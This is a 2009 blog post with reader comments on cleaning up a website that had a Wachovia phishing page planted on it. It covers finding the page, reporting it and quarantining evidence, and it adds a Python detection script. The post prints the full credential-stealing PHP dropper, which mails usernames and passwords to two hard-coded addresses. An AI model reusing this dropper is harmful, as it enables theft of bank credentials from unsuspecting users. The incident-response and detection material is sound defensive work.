
If your site has been compromised with phishing attack code…

March 17th, 2009  |  Published in internet, legal, technology, web | Tags: attack, internet, phishing, php, scam, security, technology, tutorial, wachovia, web  |  5 Comments

I recently received the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that's how I learned that my site had been compromised and that phishing code had been injected into it. If this happens to you, do you know what the right thing to do is? How do you fix it? Here is what I did; I think it is worth sharing so that it may be useful to others. So here goes.

Step 1. Disable Your Site

First, disable your site and bring it down temporarily. The last thing you want is for more people to be scammed by the hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on Unix/Linux you can run "chmod -R 000 <website-home-directory>" (refer to the chmod tutorial here). For those using cPanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack, we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. With phishing, someone is trying to steal your username and password by impersonating a credible website that requires your username and password to log in. In HTML, this is typically accomplished through forms, which begin with a <form> tag. So I dug through the code and I found two form tags.

The first one was:

<form method="get" action="http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?" name="searchForm" onsubmit="return verifyQuery(this.searchString);">

…..

This looks fine because the 'action' parameter points to http://search.wachovia.com/selfservice..., which is a search script on the Wachovia website. So anyone filling in this form is sending their data to the Wachovia website, and the hacker will not get any information from it.

Now to the second form tag:

<form method="post" action="screen.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return submitLogin(this)">

……

Aha! The smoking gun! Why? Look at the 'action' parameter in this 'form' tag: it says 'screen.php', which is clearly not a script on the Wachovia servers but something hosted on my website! So the hackers installed another script on my system to harvest the usernames and passwords. Next I look at what is inside this 'screen.php' file, which is located in the same directory as the 'confirm.html' file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the 'screen.php' file and this is what I find:

<?php

$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = "Hello
userid : $userid
password : $password
--------0WN3d By Louis----------------
IP : $ip
DATE : $datamasii
";

$recipient = "cashbug5010@gmail.com,smithgreen@hotmail.com";
$subject = "Take What U need But Make Sure U Cash It Out !!!";

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header("Location: http://www.wachovia.com/helpcenter/0,,,00.html");
?>

So here we are! Gotcha! Check out the line '$recipient = "cashbug5010@gmail.com,smithgreen@hotmail.com";'. Clearly, the harvested credentials were being mailed to the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities, who can carry the investigation forward. And who are they? First, reply to the email address that alerted you to this phishing attack (do a 'reply all' if there were multiple recipients or Cc's on the email you received). Also copy phishing-report@us-cert.gov and cert@cert.org on this email and give them a copy of the phishing code (in this case the file 'screen.php') and the offending email addresses you found.

For now, that is all you can do; just cooperate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files by setting their permissions to 000. Now that the code has been quarantined, you can bring your website up again by restoring the permissions to what they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Note that the odds are that Google has already put out a notice against your site as a source of a phishing attack. So go to the following URL, http://www.google.com/safebrowsing/report_error/, to let Google know that the problem has been taken care of and your site is safe again.

And that's all you can do for the moment. Make sure your site is secure and that you haven't made any of your directories writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game, with hackers and people like you each trying to get smarter and better than the other.
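As an added illustration (not part of the original post), the triage below encodes the two tells found in steps 2 and 3 as checks a site owner can run over a copy of the web root: an HTML page whose login form posts to a relative path on the compromised host, and a PHP file that reads POST variables, mails them to hard-coded addresses and redirects the victim to the real site. Each flagged file is hashed so the quarantined evidence from step 5 can be referenced in the report sent in step 4. The sample files, domains and addresses are constructed, and the heuristics are assumptions, not a complete scanner.

```python
import re
import hashlib
from urllib.parse import urlparse

# Constructed samples modelled on the two files the post describes (not the real files).
SAMPLE_HTML = b"""<html><head><title>Example Bank - Personal Finance</title></head><body>
<form method="get" action="http://search.example-bank.test/search.do" name="searchForm"></form>
<form method="post" action="screen.php" name="uidAuthForm" id="uidAuthForm"></form>
</body></html>"""
SAMPLE_PHP = b"""<?php
$userid = $HTTP_POST_VARS["userid"]; $password = $HTTP_POST_VARS["password"];
$recipient = "drop1@example.test,drop2@example.test";
mail($recipient, "creds", "userid: $userid password: $password");
header("Location: http://www.example-bank.test/helpcenter/");
?>"""

FORM_RE = re.compile(r'<form\b[^>]*\baction\s*=\s*["\']([^"\']*)["\']', re.I)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def local_form_actions(html):
    """Form actions with no host part: the submit handler lives on *this* server,
    which on a page branded as someone else's site is the post's smoking gun."""
    return [a for a in FORM_RE.findall(html) if not urlparse(a).netloc]

def credential_dropper(php):
    """Match the screen.php pattern: reads POST vars, mails them to hard-coded
    addresses and redirects the victim to the real site. Returns details or None."""
    reads_post = re.search(r"\$(?:_POST|HTTP_POST_VARS)\b", php) is not None
    redirects = re.search(r"""header\s*\(\s*["']Location:""", php) is not None
    recipients = sorted(set(EMAIL_RE.findall(php)))
    if reads_post and "mail(" in php and recipients:
        return {"recipients": recipients, "redirects": redirects}
    return None

def triage(files):
    """files: {name: bytes}. Each finding carries a SHA-256 of the file as found,
    so the quarantined copy (step 5) can be tied to the report sent in step 4."""
    findings = []
    for name, data in files.items():
        text = data.decode("utf-8", "replace")
        hit = None
        if name.lower().endswith((".html", ".htm")):
            actions = local_form_actions(text)
            hit = {"local_actions": actions} if actions else None
        elif name.lower().endswith(".php"):
            hit = credential_dropper(text)
        if hit:
            findings.append({"file": name, "sha256": hashlib.sha256(data).hexdigest(), **hit})
    return findings
```

Run it as triage({"confirm.html": SAMPLE_HTML, "screen.php": SAMPLE_PHP}) to see both tells flagged; on a real web root, feed it the files under the directory named in the takedown notice.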


Responses

  1. Patrix says:

    March 17th, 2009 at 11:22 am

    You’re lucky you were at least informed by Wachovia. How do we prevent them from inserting such malicious code in the first place?

  2. Semantic Overload says:

    March 17th, 2009 at 10:01 pm

    @patrix That’s a great question! Honestly, there is no foolproof mechanism to do that. Often, the CMS engines you use themselves have security vulnerabilities that are often exploited by hackers to insert such malicious code.
    Having said that, there are mechanisms to mitigate the vulnerabilities, but they come with a price. For instance, you can give read-and-execute only permissions to all your files and directories. This ensures that the hackers don’t have the requisite permissions to install such code. But that means that you can’t upload images or do automatic upgrades from the front-end. So every time you want to ‘write’ (or add or modify) any file to your website from the browser you will have to temporarily give write permissions to the necessary files and directories and then revert the permissions back after you are done.

    So, in short, there is no guaranteed mechanism to prevent such attacks. Like I mentioned towards the end of this post: it’s a cat-and-mouse game that the CMS developers and website owners play with hackers, with each group trying to outdo the other. Sorry, I couldn’t be more helpful regarding this. Perhaps an expert on network and web security could provide a more insightful commentary on it.

  3. moonjungle says:

    March 18th, 2009 at 1:35 am

    Hey man, this is definitely useful info.

  4. Trish says:

    October 18th, 2009 at 3:22 pm

    Thank you for your post, it was extremely helpful! This same exact issue just happened to me last week — Wachovia bank security alert. I am now unable to send my URL to anyone through email due to the phishing attack code now logged with my site. I know nothing about how you fixed it, but I will forward your link to my web people. I am still dealing with the clean-up. I now think that I have a trojan or some other kind of spyware on my Mac, as many “phishy” things continue to occur that make me suspicious. Thank you again.

  5. Aneesh says:

    January 13th, 2010 at 1:48 am

    step 1 : change FTP password
    Step 2 : Download all files and clean
    Step 3 : upload Files
    Step 4 : Set 444 permission to all files, except Custom Upload folders

    Remember: do not save your FTP password in your FTP client.
    If you suspect that your system is infected, format and install the OS, then install a good antivirus + firewall. I suggest Avast free edition and Comodo Firewall.

    We have received many inquiries and we cleaned those infected sites. If your site is infected, please contact us.

    Best Regards,
    Team HelloSystemadmin.com
